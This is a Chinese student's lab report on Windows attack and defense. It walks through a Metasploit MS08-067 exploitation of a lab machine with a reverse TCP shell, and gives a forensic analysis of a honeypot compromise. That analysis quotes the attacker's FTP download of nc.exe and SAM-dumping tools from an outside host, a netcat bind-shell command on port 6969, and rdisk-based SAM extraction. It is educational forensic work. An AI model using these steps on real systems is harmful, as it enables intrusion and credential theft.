20221921 2022-2023-2 《网络攻防实践》实践六报告
1.实践内容
1.1 windows操作系统的基本结构
内核态_Windows执行体Windows执行体:Windows内核核心文件ntoskrnl.exe的上层接口,包含基本的操作系统内核服务,如进程与线程管理、内存管理、I/O管理、网络连接、进程间通信,以及安全服务。
Windows内核体:实现底层操作系统功能,如线程调度、中断和异常分发处理、多处理器同步机制。
设备驱动程序:将用户I/O操作映射为特定硬件设备I/O请求的硬件设备驱动程序,以及文件系统与网络设备驱动程序。该部分支持通过数字签名认证的第三方硬件厂商的硬件设备驱动程序加载进入内核执行。
硬件抽象层:用于屏蔽Windows内核与平台硬件差异性的底层代码。
WindowsGUI内核实现代码:即win32k.sys文件。
1.2 windows操作系统的安全系统
Windows安全体系结构:
Windows操作系统基千引用监控器模型(Reference Monitor)来实现基本的对象安全模型,最关键的是位于内核的SRM(Security Reference Monitor)安全引用监控器,以及位于用户态的LSASS(Local Security Authority Subsystem Service)安全服务,他们与Winlogon/Netlogon及Eventlog等服务一起,实现了对主体用户的身份认证机制、对所有资源对象的访问控制机制,以及对访问的安全审计机制;
Windows身份认证机制:
Windows以安全主体的概念来包含所有进行资源访问请求的实体对象,包括用户、用户组和计算机三大类。对每个主体,有唯一SID来标识。Windows为每个用户和计算机设置账户进行管理,账户的根本作用是限制账户内运行的程序对系统资源的访问。用户组是为了简化管理引入的用户账户容器,通过将用户加入用户组,可以使用户拥有用户组的全部权限。Windows账户的口令经过hash后保存在SAM(Security Accounts Manager)文件或活动目录AD中。Winlogon进程、GINA图形化登录窗口与LSASS(Local Security Authority Service)服务协作完成本地身份认证过程。
Windows授权与访问控制机制:
在安全主体通过认证之后,Windows会给用户一个包含了安全主体SID的访问令牌。用户在启动进程的时候,进程在他的控制块中也会有一个集成账户安全令牌的所有访问权限的安全令牌。对于需要保护的资源,windows会将其抽象成对象,每个对象都会关联一个SD安全描述符。一个安全描述符包括:对象所有者的SID标识符、对象所在的用户组的SID标识符、自主访问控制列表、系统审计访问控制列表。
Windows安全审计机制:
统审计策略在本地安全策略中由系 统管理员定义,来确定系统对哪些事件进行记录
windows远程安全攻防技术
windows的远程攻击可以大致分为:
1、远程口令猜测和破解攻击攻击windows网络服务:关闭易受攻击的网络服务、配置防火墙、使用更安全的协议、使用强口令。
2、网络服务远程渗透攻击:打补丁、实施攻击缓解配置、利用安全核对清单对服务进行配置、安全增强插件、及时修复漏洞.
3、攻击windows客户端和用户:使用安全的软件、及时更新软件
Metasploit基础教程
Metasploit的相关模块、介绍
| 模块 | 介绍 |
|---|---|
| Exploits | 漏洞模块,使用“有效载荷”的模块 |
| Payloads | 有效载荷,由远程运行的代码组成 |
| Encoders | 编码器,确保“有效载荷”到达目的地 |
| Nops | 空指令模块,保持“有效载荷”大小一致 |
2.实践过程
2.1 动手实践Metasploit windows attacker
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
打开metasploit,输入指令msfconsole,
输入指令search ms08_067 查看漏洞MS08-067的详细信息。
输入指令exploit/windows/smb/ms08_067_netapi,然后再输入指令show payloads。
输入show targets展示可渗透攻击的靶机的操作系统及版本。
输入命令set payload generic/shell_reverse_tcp设置攻击的载荷为tcp的反向连接,然后输入命令set LHOST 192.168.200.6设置渗透攻击的主机是kali,输入set RHOST 192.168.200.27设置渗透攻击的靶机Win2k。
输入命令exploit开始渗透攻击,并在攻击成功后输入ipconfig查看靶机信息。
在kali上执行ipconfig/all得到如下图所示,查询到了靶机的IP。
2.2 取证分析实践:解码一次成功的NT系统破解攻击
(2)取证分析实践:解码一次成功的NT系统破解攻击
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击?
攻击者如何使用这个破解工具进入并控制了系统?
攻击者获得系统访问权限后做了什么?
我们如何防止这样的攻击?
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
按条件筛选ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106,找到No.117数据包,发现boot.ini启动,以及Unicode编码%C0%AF。
可以看到攻击者试图向服务器获取一个msadcs.dll文件。
对No.149追踪tcp流,可以看到字符串"ADM!ROX!YOUR!WORLD"和查询语句中的dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb,经查询得知,这次攻击是由rain forest puppy编写的msadc(2).pl渗透代码发起的。
在HTTP流中还发现了一组shell脚本代码,通过图可以看到字符串ADM!ROX!YOUR!WORLD出现的频率很高,通过查询发现这是一个名为msadc2.pl工具发起的攻击。
筛选ftp连接,发现直到编号1106连接成功的:追踪TCP流,可以看出:攻击者通过创建了ftpcom脚本,使用ftp连接www.nether.net,并以johna2k为用户haxedj00为密码下载 nc.exe、pdump.exe和samdump.dll。
在下载完文件之后,查看到 1224 号数据包,攻击者执行了这样一条命令:cmd1.exe /c nc -l -p 6969 -e cmd1.exe。表示攻击者连接了6969端口,并且获得了访问权限。
用tcp.port == 6969筛选一下,然后追踪一下TCP流来发现攻击者的行为。
攻击者首先尝试列出会话,但因为权限问题被拒绝。
列出用户。
发了一个 echo 消息到 C 盘根目录文件 README.NOW.Hax0r。
删除文件。
使用 rdisk 尝试获得 SAM 口令文件(安全账号管理器),rdisk 是磁盘修复程序,执行 rdisk /s- 备份关键系统信息,在 /repair 目录中就会创建一个名为 sam._ 的 SAM 压缩拷贝,并且攻击者把这个文件拷贝到 har.txt 并打印。
从tcp流可以看到攻击者的行为。
2.3 团队对抗实践:windows系统远程渗透攻击和分析
(3)团队对抗实践:windows系统远程渗透攻击和分析
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
首先用kali ping防守方,可以ping通。
攻方使用metasploit选择漏洞进行攻击,获得控制权。
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
我使用的是kali的wireshark,在同一网段下,kali的wireshark可以对攻击进行监听。
3.学习中遇到的问题及解决
问题:在进行实验一时,Win2KServer无法ping通kali,
问题解决方案:检查发现,Win2KServer和kali不在同一局域网内,更改后可以ping通。
4.实践总结
更加深入的了解了metasploit软件,以及攻击问题。
参考资料
- 《网络攻防技术与实践》
- 博客园
扫一扫
912
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
